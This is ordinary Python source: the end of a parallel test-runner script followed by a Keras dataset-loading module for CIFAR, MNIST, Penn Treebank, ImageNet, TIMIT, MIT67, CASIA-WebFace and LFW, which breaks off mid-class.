# Calculate the max number of CPUs that can be used. Use n-1 to ensure normal computer activities are still running
n_cpus = mp.cpu_count() - 1
if DEBUG:
if number_processes > n_cpus:
print(font.BOLD + font.RED + "Info:" + font.END + font.END, "Less CPUs are available than specified.")
print(font.BOLD + "Max Number of CPUs:" + font.END, n_cpus)
# If less processes are wanted, set this here
if number_processes < n_cpus:
n_cpus = number_processes
if DEBUG:
print(font.BOLD + "Used CPUs:" + font.END, n_cpus,"\n")
# Output queue for the finished processes output. Will write to file no matter what happens in the processes
output_queue = Queue()
# Add an initial value to the file in order to secure correct json-file output
f = open(output_filename, 'w')
f.write('{"initialized" : true')
f.close()
# Measure the time the processes take because why not, also nice for debugging!
t1 = time()
# Start a daemon thread that is able to write to file while the processes are still running
output_thread = OutputThread(output_queue, output_filename)
output_thread.start()
# To execute in parallel a queue is provided.
# From the queue the processes are started as soon as there's space.
# The number of processes is limited by the user.
try:
proc_queue = mp.Queue(maxsize=len(commands))
# Adding an index to the command to keep track of the commands ids
for i, cmd in enumerate(commands):
proc_queue.put((i, cmd))
active_processes = []
lock = mp.Lock()
for proc in range(number_processes):
active_processes.append(thr.Thread(target=work, args=(proc_queue, lock, time_limit, memory_limit, output_queue)))
active_processes[proc].start()
# Wait for the processes/threads to finish
for proc in active_processes:
proc.join()
except KeyboardInterrupt:
print("Tests manually aborted. Some tests might not be finished.")
except:
print(font.RED + "An unexpected error occurred." + font.END)
print("Sorry about that. The finished processes should be written to the specified output file anyway ... if not please contact the developer(s).")
finally:
# Stop file output thread
output_thread.stop()
output_thread.join()
# Write the rest of the output queue to the file
# If something goes wrong in the program the queue remaining content will be written to the file eventually
f = open(output_filename, 'a')
while not output_queue.empty():
f.write(output_queue.get())
f.write("}")
f.close()
# Calculate the time the program used to do all the processes.
# Has no specific use except a nice output at the end of the Testmaster
t2 = time()
count_time = int(t2-t1)
if count_time < 60:
print(font.CYAN + font.BOLD + "\nTestmaster worked for approx.", count_time, "seconds." + font.END + font.END)
else:
count_time = round(count_time / 60, 2)
print(font.CYAN + font.BOLD + "\nTestmaster worked for approx.", count_time, "minutes." + font.END + font.END)
print(font.CYAN + "Finished writing to file!" + font.END)
print("The output can be found in", font.BOLD + output_filename + font.END)
|
datasets.py
|
#
# Copyright (c) 2017 Idiap Research Institute, http://www.idiap.ch/
# Written by Angelos Katharopoulos <angelos.katharopoulos@idiap.ch>
#
from bisect import bisect_left
from collections import OrderedDict, deque
from functools import partial
import gzip
from itertools import islice
import os
from os import path
import pickle
import sys
from tempfile import TemporaryFile
from threading import Condition, Lock, Thread
from keras.applications.resnet50 import preprocess_input
from keras.datasets import cifar10, cifar100, mnist
from keras.preprocessing.image import ImageDataGenerator
from keras.utils import np_utils
from keras.utils.generic_utils import Progbar
import numpy as np
from .utils.functional import compose
try:
from PIL import Image as pil_image
except ImportError:
pass
class cifar_sanity_check(object):
"""Create a dataset from a subset of CIFAR10 that is designed to be ideal
for importance sampling by having a sample repeated thousands of times"""
def __init__(self, classes=(3, 5), replicate=30000, replicate_idx=42):
assert len(classes) > 1
self.classes = classes
self.replicate = replicate
self.replicate_idx = replicate_idx
def load_data(self):
# Load the original data
(X_train, y_train), (X_test, y_test) = cifar10.load_data()
# Get only the classes given
idxs_train = np.arange(len(y_train))[
np.logical_or(*[y_train == c for c in self.classes]).ravel()
]
idxs_test = np.arange(len(y_test))[
np.logical_or(*[y_test == c for c in self.classes]).ravel()
]
X_train = X_train[idxs_train]
y_train = y_train[idxs_train]
X_test = X_test[idxs_test]
y_test = y_test[idxs_test]
for i, c in enumerate(self.classes):
y_train[y_train == c] = i
y_test[y_test == c] = i
# Replicate on document in the training set
x, y = X_train[self.replicate_idx], y_train[self.replicate_idx]
x = np.tile(x, (self.replicate, 1, 1, 1))
y = np.tile(y, (self.replicate, 1))
return (
(np.vstack([X_train, x]), np.vstack([y_train, y])),
(X_test, y_test)
)
class canevet_icml2016_nn(object):
"""Approximates the artifical dataset used in [1] section 4.2.
[1] Can\'evet, Olivier, et al. "Importance Sampling Tree for Large-scale
Empirical Expectation." Proceedings of the International Conference on
Machine Learning (ICML). No. EPFL-CONF-218848. 2016.
"""
def __init__(self, N=8192, test_split=0.33, smooth=40):
self.N = N
self.test_split = test_split
self.smooth = smooth
def load_data(self):
# Create the data using magic numbers to approximate the figure in
# canevet_icml2016
x = np.linspace(0, 1, self.N).astype(np.float32)
ones = np.ones_like(x).astype(int)
boundary = np.sin(4*(x + 0.5)**5)/3 + 0.5
data = np.empty(shape=[self.N, self.N, 3], dtype=np.float32)
data[:, :, 0] = 1-x
for i in range(self.N):
data[i, :, 1] = 1-x[i]
data[i, :, 2] = 1 / (1 + np.exp(self.smooth*(x - boundary[i])))
data[i, :, 2] = np.random.binomial(ones, data[i, :, 2])
data = data.reshape(-1, 3)
np.random.shuffle(data)
# Create train and test arrays
split = int(len(data)*self.test_split)
X_train = data[:-split, :2]
y_train = data[:-split, 2]
X_test = data[-split:, :2]
y_test = data[-split:, 2]
return (X_train, y_train), (X_test, y_test)
class BaseDataset(object):
class _DataProxy(object):
def __init__(self, dataset, subset):
self.data = getattr(dataset, "_%s_data" % (subset,))
self.size = getattr(dataset, "_%s_size" % (subset,))
def __getitem__(self, idxs):
return self.data(idxs)
def __len__(self):
return self.size()
def _train_data(self, idxs=slice(None)):
"""Return the training data in the form (x, y)"""
raise NotImplementedError()
def _train_size(self):
"""Training data length"""
x, y = self._train_data()
if isinstance(x, (list, tuple)):
return len(x[0])
else:
return len(x)
def _test_data(self, idxs=slice(None)):
"""Return the testing data in the form (x, y)"""
raise NotImplementedError()
def _test_size(self):
"""Test data length"""
x, y = self._test_data()
if isinstance(x, (list, tuple)):
return len(x[0])
else:
return len(x)
def _slice_data(self, x, y, idxs):
if isinstance(x, (list, tuple)):
return [xi[idxs] for xi in x], y[idxs]
else:
return x[idxs], y[idxs]
def _extract_shape(self, x):
if isinstance(x, (list, tuple)):
return [xi.shape[1:] for xi in x]
return x.shape[1:]
@property
def train_data(self):
return self._DataProxy(self, "train")
@property
def test_data(self):
return self._DataProxy(self, "test")
@property
def shape(self):
"""Return the shape of the samples"""
raise NotImplementedError()
@property
def output_size(self):
"""Return the number of outputs"""
raise NotImplementedError()
@property
def output_shape(self):
"""Return the shape of the output (it could differ for seq models for
instance)."""
return (self.output_size,)
class InMemoryDataset(BaseDataset):
"""A dataset that fits in memory and is simply 4 numpy arrays (x, y) *
(train, test) where x can also be a list of numpy arrays"""
def __init__(self, X_train, y_train, X_test, y_test, categorical=True):
self._x_train = X_train
self._x_test = X_test
# are the targets to be made one hot vectors
if categorical:
self._y_train = np_utils.to_categorical(y_train)
self._y_test = np_utils.to_categorical(y_test)
self._output_size = self._y_train.shape[1]
# handle sparse output classification
elif issubclass(y_train.dtype.type, np.integer):
self._y_train = y_train
self._y_test = y_test
self._output_size = self._y_train.max() + 1 # assume 0 based idxs
# not classification, just copy them
else:
self._y_train = y_train
self._y_test = y_test
self._output_size = self._y_train.shape[1]
def _train_data(self, idxs=slice(None)):
return self._slice_data(self._x_train, self._y_train, idxs)
def _test_data(self, idxs=slice(None)):
return self._slice_data(self._x_test, self._y_test, idxs)
@property
def shape(self):
return self._extract_shape(self._x_train)
@property
def output_size(self):
return self._output_size
@classmethod
def from_loadable(cls, dataset):
(a, b), (c, d) = dataset.load_data()
return cls(a, b, c, d)
class InMemoryImageDataset(InMemoryDataset):
"""Make sure that the in memory dataset has 4 dimensions and is normalized
to [0, 1]"""
def __init__(self, X_train, y_train, X_test, y_test, categorical=True):
# Expand the dims and make sure the shapes are correct image shapes
if len(X_train.shape) < 4:
X_train = np.expand_dims(X_train, axis=-1)
X_test = np.expand_dims(X_test, axis=-1)
assert X_train.shape[1:] == X_test.shape[1:]
assert len(X_train.shape) == 4
# Normalize to [0, 1]
X_train = X_train.astype(np.float32) / X_train.max()
X_test = X_test.astype(np.float32) / X_test.max()
super(InMemoryImageDataset, self).__init__(
X_train,
y_train,
X_test,
y_test,
categorical=categorical
)
CIFAR10 = partial(InMemoryImageDataset.from_loadable, cifar10)
CIFAR100 = partial(InMemoryImageDataset.from_loadable, cifar100)
MNIST = partial(InMemoryImageDataset.from_loadable, mnist)
CIFARSanityCheck = compose(
InMemoryImageDataset.from_loadable,
cifar_sanity_check
)
CanevetICML2016 = compose(InMemoryDataset.from_loadable, canevet_icml2016_nn)
class GeneratorDataset(BaseDataset):
"""GeneratorDataset wraps a generator (or two) and partially implements the
BaseDataset interface."""
def __init__(self, train_data, test_data=None, test_data_length=None,
cache_size=5):
self._train_data_gen = train_data
self._test_data_gen = test_data
self._test_data_len = test_data_length
self._cache_size = cache_size
# Determine the shapes and sizes
x, y = next(self._train_data_gen)
self._shape = self._extract_shape(x)
self._output_size = y.shape[1] if len(y.shape) > 1 else 1
# Create the queues
self._train_cache = deque()
self._train_lock = Lock()
self._train_cv = Condition(self._train_lock)
self._test_cache = deque()
self._test_lock = Lock()
self._test_cv = Condition(self._test_lock)
# Start the threads
self._train_thread = Thread(
name="train_thread",
target=self._generator_thread,
args=(
self._train_data_gen,
self._train_cache,
self._train_lock,
self._train_cv,
self._cache_size
)
)
self._test_thread = Thread(
name="test_thread",
target=self._generator_thread,
args=(
self._test_data_gen,
self._test_cache,
self._test_lock,
self._test_cv,
self._cache_size
)
)
self._train_thread.daemon = True
self._test_thread.daemon = True
self._train_thread.start()
self._test_thread.start()
@staticmethod
def _generator_thread(gen, cache, lock, cv, max_size):
if gen is None:
return
if isinstance(gen, (tuple, list, np.ndarray)):
return
while True:
xy = next(gen)
with lock:
while len(cache) >= max_size:
cv.wait()
cache.append(xy)
cv.notify()
def _get_count(self, idxs):
if isinstance(idxs, slice):
# Use 2**32 as infinity
start, stop, step = idxs.indices(2**32)
return (stop - start) // step
elif isinstance(idxs, (list, np.ndarray)):
return len(idxs)
elif isinstance(idxs, int):
return 1
else:
raise IndexError("Invalid indices passed to dataset")
def _get_at_least_n(self, cache, lock, cv, n):
cnt = 0
batches = []
with lock:
while cnt < n:
while len(cache) <= 0:
cv.wait()
batch = cache.popleft()
cv.notify()
cnt += len(batch[1])
if len(batch[1].shape)==1:
batch[1] = np.expand_dims(batch[1], -1)
if isinstance(batch[0], (list, tuple)):
batches.append(list(batch[0]) + [batch[1]])
else:
batches.append(batch)
try:
xy = tuple(map(np.vstack, zip(*batches)))
except ValueError:
# This means that the batches differ in more than the batch
# dimension
shapes = [
np.array([batch[i].shape for batch in batches])
for i in range(len(batches[0]))
]
N = shapes[0].sum(axis=0)[0]
shapes = [s.max(axis=0) for s in shapes]
shapes = [(N,) + tuple(s[1:].tolist()) for s in shapes]
xy = [
np.zeros(s, dtype=d.dtype)
for s, d in zip(shapes, batches[0])
]
starts = [0]*max(map(len, shapes))
for batch in batches:
for xyi, data in zip(xy, batch):
slices = tuple(
slice(start, start+length)
for start, length in zip(starts, data.shape)
)
xyi[slices] = data
starts[0] += len(batch[0])
if len(xy) > 2:
return list(xy[:-1]), xy[-1]
else:
return xy
def _train_data(self, idxs=slice(None)):
N = self._get_count(idxs)
x, y = self._get_at_least_n(
self._train_cache,
self._train_lock,
self._train_cv,
N
)
return self._slice_data(x, y, slice(N))
def _train_size(self):
raise RuntimeError("This dataset has no size")
def _test_data(self, idxs=slice(None)):
# No test data
if self._test_data_gen is None:
raise RuntimeError("This dataset has no test data")
# Test data are all in memory
if isinstance(self._test_data_gen, (tuple, list, np.ndarray)):
x, y = self._test_data_gen
return self._slice_data(x, y, idxs)
# Test data are provided via a generator
N = min(self._test_data_len, self._get_count(idxs))
x, y = self._get_at_least_n(
self._test_cache,
self._test_lock,
self._test_cv,
N
)
return self._slice_data(x, y, slice(N))
def _test_size(self):
# No test data
if self._test_data_gen is None:
raise RuntimeError("This dataset has no test data")
# Test data are all in memory
if isinstance(self._test_data_gen, (tuple, list, np.ndarray)):
x, y = self._test_data_gen
return len(x)
# Test data are provided via a generator
return self._test_data_len
@property
def shape(self):
return self._shape
@property
def output_size(self):
return self._output_size
class ZCAWhitening(InMemoryImageDataset):
"""Make a whitened copy of the decorated dataset in memory."""
def __init__(self, dataset):
# Get the data in memory
x_train, y_train = dataset.train_data[:]
x_test, y_test = dataset.test_data[:]
# Make the whitener and train it
gen = ImageDataGenerator(zca_whitening=True, featurewise_center=True)
gen.fit(x_train)
batches_train = list(islice(
gen.flow(x_train, y_train, 32),
int(np.ceil(len(x_train) / 32.))
))
batches_test = list(islice(
gen.flow(x_test, y_test, 32),
int(np.ceil(len(x_test) / 32.))
))
super(ZCAWhitening, self).__init__(
np.vstack([b[0] for b in batches_train]),
np.vstack([b[1] for b in batches_train]),
np.vstack([b[0] for b in batches_test]),
np.vstack([b[1] for b in batches_test]),
categorical=False
)
class AugmentedImages(BaseDataset):
def __init__(self, dataset, augmentation_params, N=None):
# Initialize member variables
self.dataset = dataset
self.augmentation_params = augmentation_params
self.N = len(self.dataset.train_data) * 10 if N is None else N
assert len(self.dataset.shape) == 3
# Allocate space for the augmented data
self._x = np.memmap(
TemporaryFile(),
dtype=np.float32,
shape=(self.N,) + self.dataset.shape
)
self._y = np.zeros((self.N, self.dataset.output_size))
# Train a generator and generate all the data
generator = ImageDataGenerator(**self.augmentation_params)
x, y = self.dataset.train_data[:]
generator.fit(x)
start = 0
for bx, by in generator.flow(x, y, batch_size=128):
end = min(self.N, start+len(bx))
self._x[start:end] = bx[:end-start]
self._y[start:end] = by[:end-start]
start = end
if start >= self.N:
break
def _train_data(self, idxs=slice(None)):
return self._x[idxs], self._y[idxs]
def _test_data(self, idxs=slice(None)):
return self.dataset.test_data[idxs]
@property
def shape(self):
return self.dataset.shape
@property
def output_size(self):
return self.dataset.output_size
class OntheflyAugmentedImages(BaseDataset):
"""Use a Keras ImageDataGenerator to augment images on the fly in a
determenistic way."""
def __init__(self, dataset, augmentation_params, N=None, random_state=0,
cache_size=None):
# Initialize some member variables
self.dataset = dataset
self.generator = ImageDataGenerator(**augmentation_params)
self.N = N or (len(self.dataset.train_data) * 10)
self.random_state = random_state
assert len(self.dataset.shape) == 3
# Figure out the base images for each of the augmented ones
self.idxs = np.random.choice(
len(self.dataset.train_data),
self.N
)
# Fit the generator
self.generator.fit(self.dataset.train_data[:][0])
# Standardize the test data
self._x_test = np.copy(self.dataset.test_data[:][0])
self._x_test = self.generator.standardize(self._x_test)
self._y_test = self.dataset.test_data[:][1]
# Create an LRU cache to speed things up a bit for the transforms
cache_size = cache_size or len(self.dataset.train_data)
self.cache = OrderedDict([(-i, i) for i in range(cache_size)])
self.cache_data = np.empty(
shape=(cache_size,) + self.dataset.shape,
dtype=np.float32
)
def _transform(self, idx, x):
# if it is not cached add it
if idx not in self.cache:
# Remove the first in and add the new idx (i is the offset in
# cache_data)
_, i = self.cache.popitem(last=False)
self.cache[idx] = i
# Do the transformation and add it to the data
np.random.seed(idx + self.random_state)
x = self.generator.random_transform(x)
x = self.generator.standardize(x)
self.cache_data[i] = x
# and if it is update it as the most recently used
else:
self.cache[idx] = self.cache.pop(idx)
return self.cache_data[self.cache[idx]]
def _train_data(self, idxs=slice(None)):
# Make sure we accept everything that numpy accepts as indices
idxs = np.arange(self.N)[idxs]
# Get the original images and then transform them
x, y = self.dataset.train_data[self.idxs[idxs]]
x_hat = np.copy(x)
random_state = np.random.get_state()
for i, idx in enumerate(idxs):
x_hat[i] = self._transform(idx, x_hat[i])
np.random.set_state(random_state)
return x_hat, y
def _test_data(self, idxs=slice(None)):
return self._x_test[idxs], self._y_test[idxs]
def _train_size(self):
return self.N
@property
def shape(self):
return self.dataset.shape
@property
def output_size(self):
return self.dataset.output_size
class PennTreeBank(BaseDataset):
"""Load the PennTreebank from Tomas Mikolov's format expected in the
default Keras directory."""
def __init__(self, context, ptb_path=None, val=True, verbose=True,
cache=True):
if ptb_path is None:
ptb_path = path.expanduser("~/.keras/datasets/ptb")
if val:
test = "valid"
else:
test = "test"
# Cache the dataset for faster subsequent loads
cache_path = path.join(ptb_path, "ptb.train-%s.pickle.gz" % (test,))
if not path.exists(cache_path):
with open(path.join(ptb_path, "ptb.train.txt")) as f:
train = [l.split() + ['<EOS>'] for l in f]
with open(path.join(ptb_path, "ptb.%s.txt" % (test,))) as f:
test = [l.split() + ['<EOS>'] for l in f]
V = np.array(sorted({w for l in train for w in l}))
N = max(max(map(len, train)), max(map(len, test)))
# No need to have context bigger than the biggest sentence
context = min(context, N)
# Allocate memory
x_train = np.empty((0, context), dtype=np.int32)
y_train = np.empty((0, 1), dtype=np.int32)
x_test = np.empty_like(x_train)
y_test = np.empty_like(y_train)
# Encode the strings to numbers
if verbose:
prog = Progbar(len(train) + len(test))
for i, s in enumerate(train):
xi, yi = self._encode(s, V, context)
x_train = np.vstack([x_train, xi])
y_train = np.vstack([y_train, yi])
if verbose and i % 100 == 0:
prog.update(i)
for i, s in enumerate(test):
xi, yi = self._encode(s, V, context)
x_test = np.vstack([x_test, xi])
y_test = np.vstack([y_test, yi])
if verbose and i % 100 == 0:
prog.update(len(train) + i)
if verbose:
prog.update(len(train) + len(test))
with gzip.open(cache_path, "wb") as f:
pickle.dump(
{
"train": (x_train, y_train),
"test": (x_test, y_test),
"vocab": V
},
f,
protocol=2
)
# Read the dataset from the cached binary file
with gzip.open(cache_path) as f:
data = pickle.load(f)
self._x_train, self._y_train = data["train"]
self._x_test, self._y_test = data["test"]
self.V = data["vocab"]
def _encode(self, s, V, context):
"""
Arguments
----------
s: Sentence as a list of strings
V: Vocabulary as a np array of strings
context: The maximum length of previous words to include
"""
idxs = np.searchsorted(V, s)
x = np.zeros((len(s)-1, context), dtype=np.int32)
y = np.zeros((len(s)-1, 1), np.int32)
for i in range(1, len(s)):
x[i-1, :i] = idxs[:i][-context:] + 1 # 0 means missing value
y[i-1] = idxs[i]
return x, y
def _train_data(self, idxs=slice(None)):
return self._x_train[idxs], self._y_train[idxs]
def _test_data(self, idxs=slice(None)):
return self._x_test[idxs], self._y_test[idxs]
@property
def shape(self):
return self._x_train.shape[1:]
@property
def output_size(self):
return len(self.V)
class ImageNetDownsampled(BaseDataset):
"""Dataset interface to the downsampled ImageNet [1].
The data are expected in the following format:
_ base-path/
\_ imagenet-16x16
|_ imagenet-32x32
|_ imagenet-64x64
\_ mean.npy
|_ train_data.npy
|_ train_labels.npy
|_ val_data.npy
|_ val_labels.npy
1: A Downsampled Variant of ImageNet as an Alternative to the CIFAR
datasets (https://arxiv.org/abs/1707.08819v2)
"""
def __init__(self, basepath, size=32, mmap=False):
basepath = path.join(basepath, "imagenet-%dx%d" % (size, size))
self.mean = np.load(path.join(basepath, "mean.npy"))
self._y_train = np.load(path.join(basepath, "train_labels.npy"))
self._y_val = np.load(path.join(basepath, "val_labels.npy"))
self._x_train = np.load(
path.join(basepath, "train_data.npy"),
mmap_mode="r" if mmap else None
)
self._x_val = np.load(
path.join(basepath, "val_data.npy"),
mmap_mode="r" if mmap else None
)
def _get_batch(self, X, Y, idxs):
"""Preprocess the batch by subtracting the mean and normalizing."""
if isinstance(idxs, slice):
idxs = np.arange(2*len(X))[idxs]
N = len(idxs)
x = np.zeros((N,) + self.shape, dtype=np.float32)
y = np.zeros((N, 1000), dtype=np.float32)
# Fill in the class information
y[np.arange(N), Y[idxs % len(X)]-1] = 1.
# Fill in the images
d = self.shape[0]
x[:] = X[idxs % len(X)]
flip = (idxs / len(X)) == 1 # if idx > len(X) flip horizontally
x[flip] = x[flip, :, ::-1]
x -= self.mean
x /= 255
return x, y
def _train_data(self, idxs=slice(None)):
return self._get_batch(self._x_train, self._y_train, idxs)
def _test_data(self, idxs=slice(None)):
return self._get_batch(self._x_val, self._y_val, idxs)
def _train_size(self):
return 2*len(self._x_train)
def _test_size(self):
return len(self._x_val)
@property
def shape(self):
return self._x_train.shape[1:]
@property
def output_size(self):
return 1000
class TIMIT(InMemoryDataset):
"""Load the TIMIT dataset [1] from a custom pickled format.
The format is the following:
[
X_train,
y_train,
X_val,
y_val,
X_test,
y_test
]
Each X_* is a list of numpy arrays that contain the full utterance
features.
Each y_* is a list of numpy arrays that contain the per phoneme label
for the full utterance.
[1] Garofolo, John S., et al. TIMIT Acoustic-Phonetic Continuous Speech
Corpus LDC93S1. Web Download. Philadelphia: Linguistic Data Consortium,
1993
"""
def __init__(self, context, path, val=False):
# Read the data
data = pickle.load(open(path))
train = data[:2]
test = data[2:4] if val else data[4:]
x_train, y_train = self._create_xy(train, context)
x_test, y_test = self._create_xy(test, context)
super(TIMIT, self).__init__(
x_train, y_train,
x_test, y_test,
categorical=False
)
def _create_xy(self, data, context):
X = []
y = []
for xi, yi in zip(*data):
for j in range(context-1, len(xi)):
X.append(xi[j-context+1:j+1])
y.append(yi[j:j+1]) # slice so that y.shape == (?, 1)
return np.array(X, dtype=np.float32), np.array(y, dtype=np.int32)
class MIT67(BaseDataset):
"""Dataset interface to the MIT67 Indoor Scenes dataset [1].
The dataset is expected to be in the following format:
- base-path/
\_ images
\_ airport_inside
|_ artstudio
|_ ...
|_ TrainImages.txt
|_ TestImages.txt
1: Quattoni, Ariadna, and Antonio Torralba. "Recognizing indoor scenes."
Computer Vision and Pattern Recognition, 2009. CVPR 2009. IEEE
Conference on. IEEE, 2009.
"""
def __init__(self, basepath):
self._base = basepath
# Read the file paths
self._train_set = np.array([
l.strip() for l in
open(path.join(basepath, "TrainImages.txt"))
])
self._test_set = np.array([
l.strip() for l in
open(path.join(basepath, "TestImages.txt"))
])
# Create masks to lazily read the data in memory
self._unread_train = np.ones(len(self._train_set), dtype=np.bool)
self._unread_test = np.ones(len(self._test_set), dtype=np.bool)
# Allocate space for the images
self._x_train = np.zeros(
(len(self._train_set), 224, 224, 3),
dtype=np.float32
)
self._x_test = np.zeros(
(len(self._test_set), 224, 224, 3),
dtype=np.float32
)
# Create the target classes
class_set = np.array(sorted(set([
filepath.split("/")[0]
for filepath in self._train_set
])))
self._y_train = self._to_classes(self._train_set, class_set)
self._y_test = self._to_classes(self._test_set, class_set)
def _to_classes(self, files, class_set):
y = np.zeros((len(files), len(class_set)), dtype=np.float32)
for i, f in enumerate(files):
yi = f.split("/")[0]
y[i, np.searchsorted(class_set, yi)] = 1.
return y
def _read_and_return(self, unread, files, data, idxs):
if np.any(unread[idxs]):
for i in np.arange(len(files))[idxs]:
if not unread[i]:
continue
data[i] = self._read_image(files[i])
unread[i] = False
return data[idxs]
def _train_size(self):
return len(self._x_train)
def _train_data(self, idxs=slice(None)):
return self._read_and_return(
self._unread_train,
self._train_set,
self._x_train,
idxs
), self._y_train[idxs]
def _test_size(self):
return len(self._x_test)
def _test_data(self, idxs=slice(None)):
return self._read_and_return(
self._unread_test,
self._test_set,
self._x_test,
idxs
), self._y_test[idxs]
def _read_image(self, image_path):
"""Read an image from disk, resize, crop and preprocess it using the
ImageNet stats."""
image_path = path.join(self._base, "images", image_path)
img = pil_image.open(image_path).convert("RGB")
s = max(224./img.width, 224./img.height)
nw, nh = int(s * img.width), int(s * img.height)
pw, ph = int((nw - 224)/2), int((nh - 224)/2)
dims = nw, nh
box = (pw, ph, pw+224, ph+224)
img = img.resize(dims, pil_image.BILINEAR).crop(box)
return preprocess_input(np.array(img, dtype=np.float32))
@property
def shape(self):
return (224, 224, 3)
@property
def output_size(self):
return 67
class CASIAWebFace(BaseDataset):
"""Provide a BaseDataset interface to CASIAWebFace.
The interface is created for training with a triplet loss which is a bit
unorthodox.
Arguments
---------
basepath: The path to the dataset
alpha: The margin for the triplet loss (returned as target)
validation: Consider as validation set all the person ids that %
validation == 0
"""
def __init__(self, basepath, alpha=0.2, embedding=128, validation=5,
cache=4096):
# Save the configuration in member variables
self._alpha = alpha
self._embedding = embedding
# Load the paths for the images
self._basepath = basepath
ids = [x for x in os.listdir(basepath) if "." not in x]
self._train = np.array([
x for x in ids if int(x.replace("0", "")) % validation > 0
])
self._n_images = np.array([
len([
img for img in os.listdir(path.join(basepath, x))
if img.endswith("jpg")
]) for x in self._train
])
self._idxs = np.arange(self._n_images.sum())
# Create the necessary variables for the cache
self._cache = np.zeros((cache, 3, 224, 224, 3), dtype=np.float32)
self._cache_lock = Lock()
self._cache_cv = Condition(self._cache_lock)
# Start a thread to load images and wait for the cache to be filled
self._producer_thread = Thread(target=self._update_images)
self._producer_thread.daemon = True
with self._cache_lock:
self._producer_thread.start()
while np.all(self._cache[-1] == 0):
self._cache_cv.wait()
def _get_batch_memory(self, N):
if not hasattr(self, "_batch_xa") or len(self._batch_xa) < N:
self._batch_xa = np.zeros((N, 224, 224, 3), dtype=np.float32)
self._batch_xp = np.zeros_like(self._batch_xa)
self._batch_xn = np.zeros_like(self._batch_xa)
return self._batch_xa[:N], self._batch_xp[:N], self._batch_xn[:N]
def _train_data(self, idxs=slice(None)):
N = len(self._idxs[idxs])
y = np.ones((N, 1), dtype=np.float32)*self._alpha
xa, xp, xn = self._get_batch_memory(N)
samples = np.random.choice(len(self._cache), N)
with self._cache_lock:
xa[:] = self._cache[samples, 0]
xp[:] = self._cache[samples, 1]
xn[:] = self._cache[samples, 2]
return [xa, xp, xn], y
def _train_size(self):
return self._n_images.sum()
def _test_data(self, idxs=slice(None)):
return [np.random.rand(1, 224, 224, 3)]*3, np.zeros((1, 1))
def _test_size(self):
return 1
@property
def shape(self):
return [(224, 224, 3)]*3
@property
def output_size(self):
return self._embedding
def _update_images(self):
try:
with self._cache_lock:
for i in range(len(self._cache)):
triplet = self._read_random_triplet()
self._cache[i, 0] = triplet[0]
self._cache[i, 1] = triplet[1]
self._cache[i, 2] = triplet[2]
self._cache_cv.notifyAll()
while True:
triplet = self._read_random_triplet()
i = np.random.choice(len(self._cache))
with self._cache_lock:
self._cache[i, 0] = triplet[0]
self._cache[i, 1] = triplet[1]
self._cache[i, 2] = triplet[2]
except:
if sys is not None:
sys.stderr.write("Producer thread tear down by exception\n")
def _read_random_triplet(self):
pos = np.random.choice(len(self._train))
neg = np.random.choice(len(self._train))
if pos == neg:
return self._read_random_triplet()
anchor_image, pos_image = np.random.choice(self._n_images[pos], 2)
if anchor_image == pos_image:
return self._read_random_triplet()
neg_image = np.random.choice(self._n_images[neg])
# Now we have our triplet
return (
self._read_image(self._train[pos], anchor_image),
self._read_image(self._train[pos], pos_image),
self._read_image(self._train[neg], neg_image)
)
def _read_image(self, person, image):
image_path = path.join(
self._basepath,
person,
"{:03d}.jpg".format(image+1)
)
img = pil_image.open(image_path).convert("RGB")
img = img.resize((224, 224), pil_image.BILINEAR)
return preprocess_input(np.array(img, dtype=np.float32))
class LFW(BaseDataset):
"""BaseDataset interface to Labeled Faces in the Wild dataset.
The dataset provides both images and indexes for the lfw folds.
Arguments
---------
basepath: The path to the dataset
fold: [1,10] or None
Choose a fold to evaluate on or all the images
idxs: bool
Whether to load images or just indexes for the fold
"""
def __init__(self, basepath, fold=1, idxs=False):
self._basepath = basepath
self._fold = fold
self._idxs = idxs
self._collect_images()
self._collect_pairs()
def _image_path(self, name, img):
return path.join(name, "{}_{:04d}".format(name, img))
def _get_person(self, image):
return bisect_left(
self._names,
image.split(os.sep)[0]
)
def _get_idx(self, name, img):
return bisect_left(self._images, self._image_path(name, img))
def _collect_images(self):
"""Collect all the image paths into a sorted list."""
image_path = path.join(self._basepath, "all_images")
self._names = np.array(sorted(set([
name for name in os.listdir(image_path)
if path.isdir(path.join(image_path, name))
])))
self._images = np.array(sorted([
path.join(name, img)
for name in self._names
for img in os.listdir(path.join(image_path, name))
if img.endswith(".jpg")
]))
def _collect_pairs(self):
if self._fold is None:
return
with open(path.join(self._basepath, "view2", "pairs.txt")) as f:
folds, n = map(int, next(f).split())
assert 1 <= self._fold <= folds
idxs = np.zeros((n*2*folds, 2), dtype=np.int32)
matches = np.zeros((n*2*folds, 1), dtype=np.float32)
for i, l in enumerate(f):
parts = l.split()
matches[i] = float(len(parts) == 3)
if matches[i]:
idxs[i] = [
self._get_idx(parts[0], int(parts[1])),
self._get_idx(parts[0], int(parts[2]))
]
else:
idxs[i] = [
self._get_idx(parts[0], int(parts[1])),
self._get_idx(parts[2], int(parts[3]))
]
idxs_2 = np.arange(len(idxs))
train = np.logical_or(
idxs_2 < 2*n*(self._fold - 1),
idxs_2 >= 2*n*self._fold
)
test = np.logical_and(
idxs_2 >= 2*n*(self._fold - 1),
idxs_2 < 2*n*self._fold
)
self._idxs_train = idxs[train]
self._idxs_test = idxs[test]
self._y_train = matches[train]
self._y_test = matches[test]
def _read_image(self, image):
full_img_path = path.join(self._basepath, "all_images", image)
img = pil_image.open(full_img_path).convert("RGB")
img = img.resize((224, 224), pil_image.BILINEAR)
return preprocess_input(np.array(img, dtype=np.float32))
def _get_data(self, pairs):
if self._idxs:
return pairs
else:
x1 = np.stack(map(self._read_image, self._images[pairs[:, 0]]))
x2 = np.stack(map(self._read_image, self._images[pairs[:, 1]]))
return [x1, x2]
def _train_data(self, idxs=slice(None)):
if self._fold is None:
images = self._images[idxs]
x = np.stack(map(self._read_image, images))
y = np.array(map(self._get_person, images))
else:
x = self._get_data(self._idxs_train[idxs])
y = self._y_train[idxs]
return x, y
def _train_size(self):
if self._fold is None:
return len(self._images)
return len(self._idxs_train)
def _test_data(self, idxs=slice(None)):
if self._fold is None:
raise NotImplementedError()
x = self._get_data(self._idxs_test[idxs])
y = self._y_test[idxs]
return x, y
def _test_size(self):
return 0 if self._fold is None else len(self._idxs_test)
@property
def shape(self):
if self._fold is None:
return (224, 224, 3)
else:
if self._idxs:
return (2,)
else:
return [(224, 224, 3)]*2
@property
def output_size(self):
return 1
class CASIAWebFace2(BaseDataset):
"""Provide a classification interface to CASIAWebFace."""
def __init__(self, basepath):
self._basepath = basepath
ids = [x for x in os.listdir(basepath) if "." not in x]
self._output_size = len(ids)
self._images = [
